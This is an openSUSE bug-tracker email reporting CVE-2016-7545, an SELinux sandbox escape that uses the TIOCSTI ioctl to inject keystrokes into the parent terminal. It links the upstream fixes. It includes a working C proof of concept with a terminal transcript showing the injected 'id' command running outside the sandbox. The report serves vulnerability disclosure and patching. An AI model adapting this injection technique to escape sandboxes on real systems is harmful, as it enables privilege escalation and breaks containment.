[Bug 1000998] New: VUL-0: CVE-2016-7545: [SELinux] nonpriv session can escape to the parent session

http://bugzilla.opensuse.org/show_bug.cgi?id=1000998 Bug ID: 1000998 Summary: VUL-0: CVE-2016-7545: [SELinux] nonpriv session can escape to the parent session Classification: openSUSE Product: openSUSE Distribution Version: Leap 42.1 Hardware: Other OS: Other Status: NEW Severity: Normal Priority: P5 - None Component: Security Assignee: security-team@suse.de Reporter: mikhail.kasimov@gmail.com QA Contact: qa-bugs@suse.de Found By: --- Blocker: --- CVE-2016-7545 info: http://seclists.org/oss-sec/2016/q3/606 ========== Hi, When executing a program via the SELinux sandbox, the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing an attacker to escape the sandbox. $ cat test.c #include #include int main() { char *cmd = "id\n"; while(*cmd) ioctl(0, TIOCSTI, cmd++); execlp("/bin/id", "id", NULL); } $ gcc test.c -o test $ /bin/sandbox ./test id uid=1000 gid=1000 groups=1000 context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176 $ id <------ did not type this uid=1000(saken) gid=1000(saken) groups=1000(saken) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Bug report: https://bugzilla.redhat.com/show_bug.cgi?id=1378577 Upstream fix: https://marc.info/?l=selinux&m=147465160112766&w=2 https://marc.info/?l=selinux&m=147466045909969&w=2 https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b63688... Federico Bento. ========== Red Hat Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=1378577 -- You are receiving this mail because: You are on the CC list for the bug.